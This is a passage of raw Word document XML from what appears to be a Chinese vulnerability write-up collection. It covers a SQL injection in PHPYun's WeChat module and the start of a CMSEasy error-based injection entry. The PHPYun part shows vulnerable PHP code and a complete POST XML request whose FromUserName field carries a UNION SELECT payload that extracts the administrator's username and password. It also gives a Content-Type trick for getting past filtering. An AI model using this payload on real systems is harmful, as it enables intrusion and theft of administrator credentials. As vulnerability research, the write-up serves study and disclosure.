          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>直接进入到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> DB_select_once </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>方法中。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这里继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续跟进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-17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DB_select_once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-16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是否有进行过滤等。如果没有过滤则存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-16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 xml:space="preserve">sql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>注入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1"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:after="23" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="3263"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">File:/Module/class/action.class.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>:53</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="415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group id="_x0000_s9929" style="width:319.5pt;height:342.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6390,6848">
            <v:rect id="_x0000_s9954" style="position:absolute;width:6390;height:2" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s9953" style="position:absolute;left:2;top:2;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9952" style="position:absolute;left:2;top:328;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9951" style="position:absolute;left:2;top:654;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9950" style="position:absolute;left:2;top:980;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9949" style="position:absolute;left:2;top:1306;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9948" style="position:absolute;left:2;top:1632;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9947" style="position:absolute;left:2;top:1958;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9946" style="position:absolute;left:2;top:2284;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9945" style="position:absolute;left:2;top:2610;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9944" style="position:absolute;left:2;top:2936;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9943" style="position:absolute;left:2;top:3262;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9942" style="position:absolute;left:2;top:3588;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9941" style="position:absolute;left:2;top:3914;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9940" style="position:absolute;left:2;top:4240;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9939" style="position:absolute;left:2;top:4566;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9938" style="position:absolute;left:2;top:4892;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9937" style="position:absolute;left:2;top:5218;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9936" style="position:absolute;left:2;top:5544;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9935" style="position:absolute;left:6387;top:6196;width:3;height:329" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s9934" style="position:absolute;top:6196;width:2;height:329" fillcolor="#f5f5f5" stroked="f"/>
            <v:rect id="_x0000_s9933" style="position:absolute;left:2;top:5870;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9932" style="position:absolute;left:2;top:6196;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s9931" style="position:absolute;left:2;top:6522;width:6385;height:326" fillcolor="#d7d7d7" stroked="f"/>
            <v:shape id="_x0000_s9930" type="#_x0000_t202" style="position:absolute;left:2;top:1;width:6385;height:6847" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="40" w:line="319" w:lineRule="auto"/>
                      <w:ind w:right="-2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rFonts w:ascii="Consolas"/>
                        <w:spacing w:val="-36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DB_select_once($tablename,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:spacing w:val="-3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$where</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:spacing w:val="-36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spacing w:val="-36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1,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:spacing w:val="-36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$select</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:spacing w:val="-36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= "*")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{</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="14"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1" w:line="636" w:lineRule="auto"/>
                      <w:ind w:left="915" w:right="27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$cachename=$tablename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.$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where; </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:w w:val="95"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>if(!$return=$this-&gt;Memcache_set($cachename)){</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="245" w:lineRule="exact"/>
                      <w:ind w:left="183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 xml:space="preserve">$SQL = "SELECT $select FROM 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" .</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="8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$this-&gt;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def .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 $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tablename .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" WHERE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 $where limit 1";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="9"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="23"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="183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$query = $this-&gt;db-&gt;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query(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$SQL);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="7"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="23"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="1831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$return=$this-&gt;db-&gt;fetch_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array(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$query);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="7"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1"/>
                      <w:ind w:left="91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$this-&gt;Memcache_</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>set(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>$cachename,$return);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="9"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="23"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="915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w w:val="99"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>}</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="7"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="23"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="915"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>return</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Consolas"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> $return;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spacing w:line="286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所以没有过滤产生了注入工攻击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漏洞利用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="361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4"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="34" w:line="283" w:lineRule="auto"/>
        <w:ind w:right="713"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId29">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体"/>
            <w:w w:val="95"/>
          </w:rPr>
          <w:t>http://192.168.0.108/phpyun3/weixin/index.php?m=index&amp;c=inde</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>POST:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="51"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;?xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> version="1.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoding="utf-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="51"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="51"/>
        <w:ind w:left="626" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;ToUserName&gt;1111&lt;/ToUserName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="49" w:line="285" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="1113" w:firstLine="208"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;FromUserName&gt;1111' and 1=2 union select 1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>,(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>select concat(username,password) from phpyun_admin_user limit 0,1)#&lt;/FromUserName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="11"/>
        <w:ind w:left="626" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;CreateTime&gt;1402550611&lt;/CreateTime&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="51"/>
        <w:ind w:left="626" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;MsgType&gt;event&lt;/MsgType&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="51"/>
        <w:ind w:left="626" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;Event&gt;CLICK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;/Event&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="49"/>
        <w:ind w:left="626" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;EventKey&gt;myaccount&lt;/EventKey&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="51"/>
        <w:ind w:left="626" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;FuncFlag&gt;0&lt;/FuncFlag&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="51" w:line="571" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="4623"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="268067567" behindDoc="1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664510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3970020" cy="2054352"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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21"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/xml&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>这里提交将会被拦</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="571" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId31"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="60"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417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rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="322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通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> tamper Data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>来突破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添加一个：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>:text</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/xml;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="361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8"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="9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  <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3749854" cy="302152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854" cy="30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  <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3870186" cy="1417701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186" cy="14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80020F">
      <w:pPr>
        <w:spacing w:line="348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提交，查看源代码查看密码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="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3112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116877</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4081358" cy="1454277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358" cy="145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292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="8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6"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="12"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="cmseasy_无限制报错注入"/>
      <w:bookmarkStart w:id="30" w:name="_bookmark14"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">cmseasy  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>无限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>loopx9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9928" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:14.25pt;width:319.25pt;height:326pt;z-index:3136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8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($rootTag == "xjxquery") {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71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$sQuery = "";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$this-&gt;iPos++;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="1440" w:right="870" w:hanging="36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while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(!stristr($this-&gt;aObjArray[$this-&gt;iPos], "")) { if (stristr($this-&gt;aObjArray[$this-&gt;iPos], "") ||</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2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stristr(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$this-&gt;aObjArray[$this-&gt;iPos], "")) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="307" w:lineRule="auto"/>
